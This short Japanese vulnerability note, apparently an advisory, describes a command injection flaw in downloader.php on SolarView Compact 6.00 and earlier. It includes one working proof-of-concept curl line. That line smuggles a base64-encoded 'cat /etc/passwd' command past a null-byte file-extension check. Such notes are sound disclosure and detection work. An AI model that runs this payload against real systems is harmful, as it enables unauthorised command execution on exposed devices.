
SolarView Compact 6.00 にはコマンドインジェクションの脆弱性が存在し、攻撃者はdownloader.php経由で内部制限をバイパスすることによりコマンドを実行できます。
SolarView Compact 6.00 以前には、downloader.php を介して内部制限を回避し、コマンドを実行できるコマンドインジェクションの脆弱性があります。
curl http://example.com/downloader.php?file=;echo%20Y2F0IC9ldGMvcGFzc3dkCg==|base64%20-d|bash%00.zip | grep root:.*:0:0
downloader.php ページの file パラメータにアクセスすることで、内部制限をバイパスしてコマンドを注入できます。
